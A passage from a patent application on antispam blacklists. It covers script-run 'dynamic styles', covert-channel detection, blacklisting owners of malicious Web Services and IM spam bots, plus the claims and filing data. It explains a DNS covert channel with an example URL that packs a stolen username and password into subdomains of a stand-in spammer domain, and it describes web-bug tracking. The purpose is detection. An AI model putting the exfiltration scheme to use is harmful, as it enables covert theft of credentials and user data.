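        return DynamicStyleKind.REMOTE
    if read_local_state:
        return DynamicStyleKind.LOCAL
    return DynamicStyleKind.WRAPPED
```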
It should be noted that a Local or Remote Dynamic Style might be prohibited by a given browser that runs the given language in which the style's routine is written.
A Local Dynamic Style might use the machine's clock as a seed value for a random number generator, for example.
A Remote Dynamic Style might access web pages or Web Services or data files on other machines. As cautioned in "1698", the remote machines that are accessed might or might not be under the control of the document's author. Hence, care should be taken about whether to add those machines to a blacklist or not. However, if a remote machine is already on a blacklist, then this could be used to make an extra style; one that suggests the document is bad.
Suppose, instead, that the remote machine is a major web hosting site, which uses the main idea in this Invention of publishing the mapping from files to a user, f(). If the remote access is to a user on a blacklist, where this blacklist entry is done in the manner of Section 6, then we could make an extra style, in the fashion of the previous paragraph, to label the document as bad.
Suppose the user is not on a blacklist. Then, if from other styles or other analysis of the document, it is classified as bad (spam maybe), this can be used as a style that is attached to the user. To possibly decide if the user is bad. Here, the inference could be that the document author is the same as the user, and has written data into the user's pages, to be used by the document in its scripting routines; perhaps to avoid simple antispam analysis of that document.
Suppose a slave thread is executing a scripting routine, that turns out to be a Remote Dynamic Style. When it makes a network connection, it should emulate a browser if normally a browser would run the routine and pass information to the remote machine, indicating that the "agent" making the request is a browser. This prevents the remote machine from customizing its reply if it considers the agent to be an antispam entity, as opposed to a normal browser. Similarly, when the thread runs the routine, and the routine calls a function that is normally available to it in a browser, asking for information about the local machine, then the thread should implement that function, and return a typical reply, as though it were a browser. This acts against the routine having logic that tries to determine if it is being run in an antispam thread.
It might be thought that Remote Dynamic Styles could be stopped, simply by prohibiting a document, when it is loaded by the browser, to run routines that do remote access. Or, if the document is a web page, to restrict remote access to only that page's domain. But in the long run, this policy may be too crude. As electronic messages and web pages become more complex, there may be an increasing trend to encode programmatic functionality into them. Instead of them being simple static documents. This increased functionality could well involve general access to the network. If so, then spammers can be expected to take advantage by making documents with various Remote Dynamic Styles.
In the above, when we discussed a Dynamic Style having a routine written in the scripting language, there could in general be several routines that are called, in the making of that style. But, without loss of generality, and for simplicity, we just referred to a single routine for a style.
15. Detection of Possible Covert Channels
In the previous Section, we discussed Remote Dynamic Styles. One important special case involves the detection of possible covert channels. A covert channel is a means by which malware running on a machine sends data to another machine, and the transmission is done in a manner to make this non-obvious to simple external inspection. An elementary example involves web bugs or web beacons. This is where a spam message addressed to e.g. larry@somewhere.com has an <IMG> tag that loads an image from the spammer's domain. The URL in the tag has, to the right of the domain name, an encoding of that email address. So when Larry merely reads the message in his browser, the spammer knows that his email address is valid and active, because the spammer's web server log will show that URL request. In this example, there is no scripting. Each spam message is fully static.
A Remote Dynamic Style arises when a network address, either for incoming like the above, or for outgoing, like a clickable link, is made using a script. The script may also, and probably will, encode information derived about the local computer or its user into the address. This might be done to the right of the spammer's domain name, as above. Or it might be done to the left, in the subdomains. The latter is a DNS covert channel. For example, suppose the spammer's domain is spammer.com. If she runs the DNS server for that domain, then any queries from anywhere on the Internet for a subdomain may come to her DNS server. The subdomains might be information found by her spam messages' scripting routines, encoded as valid domain name characters. So, if one of her messages' scripts runs and somehow finds a username ("lucy") and plaintext password ("duk8im"), it might write an <IMG> tag that has
http://lucy.duk8im.spammer.com/...
Then her DNS server can decode the username and password, possibly in conjunction with other information that is present in the address (maybe to the right of the domain name). The DNS server can then return the raw address corresponding to spammer.com, regardless of the subdomain values. (In practice, her script would encode the data so that the encoded characters are valid in a domain name. This step was omitted above for simplicity.) Of course, in addition to or instead of using the <IMG> tag, other tags with links, like <a href=...>, might be used.
The information written into the script might also concern data external to the computer on which the browser is running. For example, in Section 13 we discussed how a script loaded from a page at a web hosting site might access data about other pages from that site, which could exist in other windows of the browser. In general, those pages would belong to other users and might not be publicly accessible. The mechanism in this Section lets the spammer encode such information and pass it out over the network to herself. Note that the dynamic address carrying this information need not go to the spammer's server at the web hosting site; in general, she could use another domain to receive the information.
It is very difficult to prevent a DNS covert channel, because DNS access is a fundamental underpinning of the Internet. In "1698", we discussed a spammer using a script to make a dynamic link in order to evade a blacklist being used against static links. There, it was the base domain ("spammer.com") which was the key item to obscure. Here, we suggest that detecting subdomains, and parsing the path to the right of the domain, might be used to indicate a possible covert channel.
This can optionally use our BME construction methods of "0046". A given BME is made from one or more messages (or web pages) that, after canonical steps are done, resolve down to the same hashes. Suppose we apply our method of "1698" to run the scripts in two messages of a BME. Each writes an address that goes into the same tag in the displayed messages, but we find that the addresses are different, though they share the spammer's base domain. Different addresses for the same tag might set a Boolean style suggesting a possible covert channel. We might define two styles: one for a possible DNS covert channel, the other for a possible path covert channel, as sketched below.
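A sketch of this comparison, assuming each message of the BME has already been rendered by the slave into a mapping from tag identifier to the address its script wrote, and that the messages are already grouped by the spammer's base domain:

    from urllib.parse import urlparse

    def covert_channel_styles(addr_by_msg):
        # addr_by_msg: one dict per message, mapping tag_id -> written URL.
        styles = {"dns_covert": False, "path_covert": False}
        for tag in set().union(*addr_by_msg):
            urls = [urlparse(m[tag]) for m in addr_by_msg if tag in m]
            if len({u.hostname for u in urls}) > 1:
                styles["dns_covert"] = True      # same tag, differing subdomains
            if len({(u.path, u.query) for u in urls}) > 1:
                styles["path_covert"] = True     # same tag, differing paths
        return styles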
Here, in the running of the scripts, our slave process, which emulates a browser, might emulate different browsers. It might also emulate system clock times that differ by days. The emulation might extend to various other aspects of an operating system, like versions of that system, or to different operating systems entirely. If virus-like scripts arise that attempt to subvert an operating system and extract user data, then the slave might ultimately be a virtual operating system, with deliberately variable dummy user data across the instances of the slave that run different messages of a BME. Alternatively, the slave might be the same virtual operating system each time, but with different dummy user data. The slave might also emulate having other windows open, where those might be showing pages (perhaps simulated ones) from a web hosting site.
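A sketch of varying the emulated environment between runs, so that environment-probing scripts betray themselves by writing different addresses; the browser and system names are illustrative:

    import itertools, random

    BROWSERS = ["Firefox/1.5", "MSIE 6.0", "Opera/8.5"]
    SYSTEMS = ["Windows XP", "Windows 2000", "Linux i686"]
    CLOCK_SKEW_DAYS = [0, 3, 11]

    def environment_profiles(n: int):
        # Pick n distinct (browser, system, clock skew) combinations for
        # the slave instances that run different messages of one BME.
        combos = list(itertools.product(BROWSERS, SYSTEMS, CLOCK_SKEW_DAYS))
        return random.sample(combos, k=min(n, len(combos)))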
If the tag is for an image, we can download the images, pretending to be a normal browser, and compare them. If they are the same, or differ only in the low-order intensity bits, or differ in some other way that a program judges negligible to a human observer, then a covert channel might be in use. Why else have different addresses that yield essentially the same image?
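As a sketch, assuming the Pillow imaging library is available (an assumption; any library with per-pixel access would do), two downloaded images might be judged negligibly different when no pixel differs by more than a small threshold in any channel:

    from PIL import Image, ImageChops

    def nearly_identical(path_a: str, path_b: str, threshold: int = 4) -> bool:
        a = Image.open(path_a).convert("RGB")
        b = Image.open(path_b).convert("RGB")
        if a.size != b.size:
            return False
        diff = ImageChops.difference(a, b)
        # getextrema() gives (min, max) per channel; inspect the max deltas.
        return all(hi <= threshold for _, hi in diff.getextrema())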
Another method avoids the use of BMEs. Instead, given a message with dynamic addresses, the slave might run it several times, each time possibly pretending to be a different operating system or holding different data. But the BMEs are useful: they indicate which messages to analyze with our methods. BMEs with large numbers of messages are likely candidates, because these already consume more system resources and more of the recipients' attention.
For incoming or outgoing links made dynamically, there is always the possibility that the spammer is deliberately writing spurious random data into each instance of these addresses, perhaps to throw off the above analysis. So the covert channel style might be a tentative diagnosis, which may then warrant more intensive study: comparing more messages of the same BME, to see if patterns can be discerned in the addresses, and perhaps also looking at other BMEs with dynamic links to the same base domain, to see if those behave the same way. If we do not make BMEs, but are just considering messages, then we can similarly look at other messages with dynamic links to the same base domain.
However, even if the spammer is writing random data into the addresses, this in itself can be considered suspicious. She is doing it dynamically. If the main reason is to avoid a blacklist, then once the dynamic address has been evaluated, either by a browser in its normal operation or by our master-slave method of "1698", it is trivial to resolve it down to her base domain: random subdomains, or random material to the right of the domain, are easily discarded once the address is available, as sketched below. So the randomness may suggest that it conceals information, or that other messages she sends carry information in their random dynamic addresses. She might even send some messages whose random dynamic addresses point to her domain but encode no information, precisely to throw us off the trail of her other messages which do encode information.
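A minimal sketch of that discarding step; the naive "last two labels" rule below is an assumption, and a real implementation should consult the public-suffix list, since suffixes like .co.uk span more than one label:

    from urllib.parse import urlparse

    def base_domain(url: str) -> str:
        host = urlparse(url).hostname or ""
        labels = host.split(".")
        return ".".join(labels[-2:]) if len(labels) >= 2 else host

    # Random subdomains and paths are easily stripped once the address exists:
    assert base_domain("http://x7qz.k2m.spammer.com/r/9t1a?u=44") == "spammer.com"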
In the above description of the DNS covert channel, we used the case where the spammer owns the target domain, and also the DNS server for that domain. Another possibility is where the spammer has subverted a DNS server for an innocent domain, and can access the DNS logs and thus extract any encoded information in the DNS queries. Our method above can also be applied to this case.
16. Future Web Services
Currently, most users' web pages are meant for manual, visual perusal by a human visitor, as suggested by the common choice of "page" to describe an HTML document. The promise of Web Services is that a new type of offering will appear on the network, one that complements rather than supplants web pages. While the definition of what a Web Service is or might be varies across the computer industry, the following qualitative description should be acceptable. A Web Service is a computer program that accepts input from one or more computers on the network, and provides output to one or more computers on the network. The input and output messages might be written in XML. The input computers could differ from the output computers. Another important characteristic is that Web Services are meant to be easily aggregated into larger Web Services; a building-block approach.
If this becomes common, then we anticipate that many programmers might have their own Web Services, located at their personal or work domains. But just as users' web pages today might sit at a web hosting site, so too might hosting sites arise for Web Services. We can also expect that some users will have several, perhaps many, Services. And just as web hosting sites have been used by spammers, so too will Web Service hosting sites be; that is, malicious Web Services can be expected to exist within those sites. How these are deemed to be malicious is outside the scope of this Invention. Instead, we describe what could happen after a given Service is found to be malicious. Let this Service be called Phi, and let it be located at WSH.com.
This determination might well be made by other Web Services that use Phi. Then one crude possibility is that those Services blacklist WSH.com. But if it is a major site with many other valid Services, this might be unacceptable. Instead, we suggest that WSH publish a mapping f(G)=U from a Web Service G to its owner U, for all Services on its site, as was done in Section 2 for web pages. Then other Web Services might construct a blacklist entry that can be represented symbolically as WSH.com/UO, where UO is the owner/author of Phi.
We choose this notation to be similar to our notation in Section 6, though an actual instantiation by others might differ. Here, the data to the left of the "/" designates a network address of WSH (it could have several), where this address is presumed to uniquely distinguish WSH from other entities on the network. The data to the right designates an identifier of the owner, presumed to be unique at WSH. The combination of these data uniquely specifies a given user at WSH with respect to any other users at any Web Service hosting sites. Of course, the use of "/" as the separator is purely arbitrary.
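A hedged sketch of such an entry and its use; f stands for the mapping f(G)=U published by WSH, and all names are illustrative:

    blacklist = set()   # entries are (site, owner) pairs, e.g. ("WSH.com", "UO")

    def report_malicious(site, service, f):
        # Blacklist only the offending owner's Services, not the whole site.
        blacklist.add((site, f(service)))

    def is_blocked(site, service, f):
        return (site, f(service)) in blacklist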
Currently, the various Web Services frameworks do implement some forms of security, notably the WS-Security standard. But these primarily concern authenticating or encrypting the messages between Services. (Cf. "Service-Oriented Architecture" by Erl, Prentice-Hall 2004, ISBN 0131428985; "J2EE Web Services" by Monson-Haefel, Addison-Wesley 2003, ISBN 0321146182; "Real World Web Services" by Iverson, O'Reilly 2004, ISBN 059600642X.) There is little if any consideration of deliberately malicious Services. This is analogous to the devising of the TCP/IP and email protocols in the 1970s and 1980s, when all parties were trusted and there was no economic incentive for phenomena like spam or phishing.
It might be considered that WSH could analyze Web Services before posting them on its site, to test their validity. Indeed, there is a market niche for some such sites to apply intensive scrutiny and hence implicitly or explicitly validate that their Services are genuine. This might appear to obviate any need for our method.
But it can be expected that there will be sites unwilling or unable to do such analysis. If WSH wants to attract as many customers as possible, it cannot charge them much. Indeed, just as there are free email providers and free web hosting sites, there might well be sites like WSH that offer free posting of Web Services. The manual analysis of a Web Service can be very labor-intensive and requires highly skilled programmers. It also essentially assumes that the source code of the Service is available to WSH. But, as we described in the context of dynamic hyperlinks in "1698", source code can be deliberately written to be difficult to understand.
Also, some users at WSH might baulk at showing it their source code, preferring instead to hand over executable versions of their Services. Some instances of WSH might insist, as a condition of usage, that the source be made available, which still presents the above analysis problems to WSH. But suppose that WSH does not insist on source code. Given an arbitrary executable, its testing cannot be guaranteed to be exhaustive. The Service might work correctly most of the time, yet have triggers for malicious activity that testing does not find. And if WSH hosts a wide variety of Services, such testing might require a heavy manual component.
All of which means that if WSH exists, it will inevitably attract malicious Services that it cannot screen out at an affordable cost. Note that the method of this Section is independent of the protocols used by the Web Services. So if the network is the Internet, the protocols are not restricted to http and https, though a given implementation of a blacklist entry might also associate specific protocols, or port numbers, with an entry. The above notation could be suitably generalized to handle these cases.
Also, the network is not restricted to the Internet; it designates any type of electronic network in which Web Services are used. We have used the term Web Services in conformance with common parlance, but our method applies to programs that behave in this manner, even if the term Web Services is not commonly used to describe them.
17. Instant Messaging Bots
As Instant Messaging (IM) has become popular, so too have "bots" arisen: software programs that act as "users", interacting with human users via IM. Some bots might be run by the IM provider and explicitly tell their interlocutors that they are bots. Other bots might be established by human users who are spammers, and who use these bots to send many spams to other IM users. An IM provider might prohibit this as a matter of policy, which means that if it gets complaints about a user being a bot spammer, it would eject that user. But it might also want a technical means of finding a bot, to minimize complaints from users.
Another case is where various users, here meaning humans, want their own means of detecting whether an IM is from a bot; perhaps their provider has no effective technical means of doing so, or they want to augment the provider's methods with their own.
In the first case, the provider can apply our BME methods of "0046" to a sample of messages from its users. In the second case, the users might have an extension to the program that reads and writes their IMs, which lets each user find BMEs and pool them in a p2p manner that preserves privacy, since the original texts are not shared; only the canonical XML representations are (see the sketch below). For both cases, the BMEs might be made only from messages that open a new "conversation". A bot would have some ability to respond to users' replies, and since those replies could be any written text, so too might the bot's responses vary; hence the responses might be low-frequency messages, while the bot's first set of messages (probably advertising something) are more likely to map into just a few BMEs, ideally just one.
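A sketch of the privacy-preserving pooling: each client reduces an incoming IM to a canonical form and shares only a hash of it. The canonical steps below (links and digits replaced by placeholders, whitespace collapsed) are simplified stand-ins for the "0046" construction:

    import hashlib, re

    def bme_key(message: str) -> str:
        canon = re.sub(r"https?://\S+", "<LINK>", message.lower())
        canon = re.sub(r"\d+", "<NUM>", canon)
        canon = re.sub(r"\s+", " ", canon).strip()
        return hashlib.sha256(canon.encode()).hexdigest()

    # Two spam variants collapse to one key; only the key is shared.
    assert bme_key("Buy now at http://a.cn/1 !") == bme_key("buy NOW at http://b.cn/2 !")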
In either case, just as for electronic mail or web pages, it is straightforward to find the BMEs that contain the most messages. Note that in general an IM could have hypertext, and the program that shows IMs would typically have the ability either to show such hypertext in a browser-like manner, or to direct such a message to a browser. Various methods in the Antispam and Antiphishing Provisionals could be used to ascertain whether a user is a spam bot. Here, this should be taken to mean that the user sends out many messages that are considered to be spam. The spammer might actually still use this user account to interact in a non-bot manner with other users, and it might be difficult to programmatically isolate such messages from regular IM. So the focus is on finding the many spam IMs that the bot initially sends out.
If the users are peering together, they can use the above method to find bots, then complain to the provider and possibly add the bots to their blacklists of unwanted users. The latter might be done if the provider takes too long to remove the bot, or disagrees with the users' assessment that another user is a spam bot.
Currently, most IM communities are each run by a single provider, and the major providers have mostly resisted efforts to open up messaging between users on different providers. Suppose this changes, so that a user has an IM program that can send and receive messages from users at various IM providers. By using the above peering, she might maintain a blacklist in which an entry designates a provider and a user address at that provider; this avoids having to blacklist all the users at a provider. Possibly, her provider might also run the above method, now extended to apply to IMs incoming from other providers. The provider could then amass a blacklist of bot users at other providers and make this available to its users as a service.
18. Summary
The above has given many details and instances of the application of our Invention. In broad terms, we can generalize it as follows:
Make a set of major web hosting sites. From each, find a mapping from an URL going to that site to the user who wrote the page referred to, for all or most such URLs. Then find from the site various information about that user, where some of the information might be independent of the user's pages and some of it extracted from those pages. This grouping of {URLs, user, information} can then be used by external entities, like an ISP or search engine. The ISP might use it to improve its antispam methods; the search engine might use it to improve its classification and rankings of the URLs.
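As a sketch, the grouping might be represented as follows; all field names and the toy weighting rule are illustrative assumptions:

    from dataclasses import dataclass, field

    @dataclass
    class HostedUser:
        site: str                                   # the hosting site
        user: str                                   # result of the site's f(URL)
        urls: list = field(default_factory=list)    # that user's pages
        info: dict = field(default_factory=dict)    # paying?, tenure, complaints...

    def weight(u: HostedUser) -> float:
        # Toy consumer: an ISP or search engine might down-weight the pages
        # of users with many complaints. The threshold is illustrative.
        return 0.1 if u.info.get("complaints", 0) > 10 else 1.0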

Claims

1. A method of a website (WH), that hosts users who write their own web pages, publishing a mapping f(URL)=User that goes from an URL at that website to a string (like a username) that uniquely designates a user at that website.
2. A method, using claim 1, where the publishing is done as a Web Service.
3. A method, using claim 1, where the website publishes ancillary information about its users, including one or more of the following: whether a user is a paying customer, whether her real name has been verified, the number of complaints about her, how long she has been a member, the number of web pages written by her.
4. A method, using claim 3, where the publishing is done as a Web Service.
5. A method, using claim 1, where a message provider generalizes a blacklist, by not having the website in its blacklist, but using the mapping f() to maintain a list of blacklisted users, and applying f() to addresses in links in incoming or outgoing messages.
6. A method where a message provider derives the mapping f() from an URL to a user, for a web page hosting website, and has a list of blacklisted users, and applies the mapping to addresses in links in incoming or outgoing messages.
7. A method, using claims 5 or 6, where the message provider periodically informs WH about the latter's users that the former has deemed to be spammers.
8. A method of WH using an URL encoding that designates whether a user is a free or paying customer.
9. A method where a central website (Agg) maintains a list of large web page hosting sites, and the mappings {f()} of each to a designation of its users.
10. A method, using claim 9, where the Agg applies various tests, some possibly manual, to validate that sites in that list are considered reputable by the Agg.
11. A method, using claim 9, where the Agg furnishes this information to message providers.
12. A method, using claim 3, where a search engine (S) uses the information made available by WH as additional input into weightings for users' webpages.
13. A method, using claim 9, where if the Agg determines that a user at WH has phishing pages, then it asks WH to close that user's account.
14. A method, using claim 13, where WH uses various methods, including making Bulk Message Envelopes for its pages, to see if it has other users with similar phishing pages.
15. A method, using claim 9, where a browser accesses that information from the Agg, and uses it in some manner.
16. A method, using claim 15, where a browser uses that information to implement a fine-grained Same Origin Policy when showing pages from WH, to prevent scripting code in one user's page from acting on any other windows of the browser that are showing pages from another user at WH.
17. A method of a website (WSH), that hosts Web Services written by its users, publishing a mapping from a hosted Web Service to the user responsible for it.
18. A method, using claim 17, where this is done as a Web Service.
19. A method, using claim 17, where other entities can use the information to maintain a list of blacklisted Web Services or users at WSH.
PCT/CN2006/003727 2005-12-31 2006-12-30 System and method for generalizing an antispam blacklist WO2007076714A1 (en)

Applications Claiming Priority (4)

Application Number Priority Date Filing Date Title
US76612505P 2005-12-31 2005-12-31
US60/766,125 2005-12-31
US61693606A 2006-12-28 2006-12-28
US11/616,936 2006-12-28

Publications (2)

Publication Number Publication Date
WO2007076714A1 true WO2007076714A1 (en) 2007-07-12
WO2007076714A8 WO2007076714A8 (en) 2007-09-27

Family

ID=38227915

Family Applications (1)

Application Number Title Priority Date Filing Date
PCT/CN2006/003727 WO2007076714A1 (en) 2005-12-31 2006-12-30 System and method for generalizing an antispam blacklist

Country Status (1)

Country Link
WO (1) WO2007076714A1 (en)

Cited By (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
EP1968264B1 (en) * 2007-02-28 2018-10-24 Strato Ag A method of filtering electronic mails and an electronic mail system
CN115037526A (en) * 2022-05-19 2022-09-09 咪咕文化科技有限公司 Anti-crawler method, device, equipment and computer storage medium
CN115037526B (en) * 2022-05-19 2024-04-19 咪咕文化科技有限公司 Anticreeper method, device, equipment and computer storage medium

Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US6085242A (en) * 1999-01-05 2000-07-04 Chandra; Rohit Method for managing a repository of user information using a personalized uniform locator
CN1588879A (en) * 2004-08-12 2005-03-02 复旦大学 Internet content filtering system and method
US20050188036A1 (en) * 2004-01-21 2005-08-25 Nec Corporation E-mail filtering system and method


Also Published As

Publication number Publication date
WO2007076714A8 (en) 2007-09-27


Legal Events

Date Code Title Description
121 Ep: the epo has been informed by wipo that ep was designated in this application
NENP Non-entry into the national phase

Ref country code: DE

122 Ep: pct application non-entry in european phase

Ref document number: 06840757

Country of ref document: EP

Kind code of ref document: A1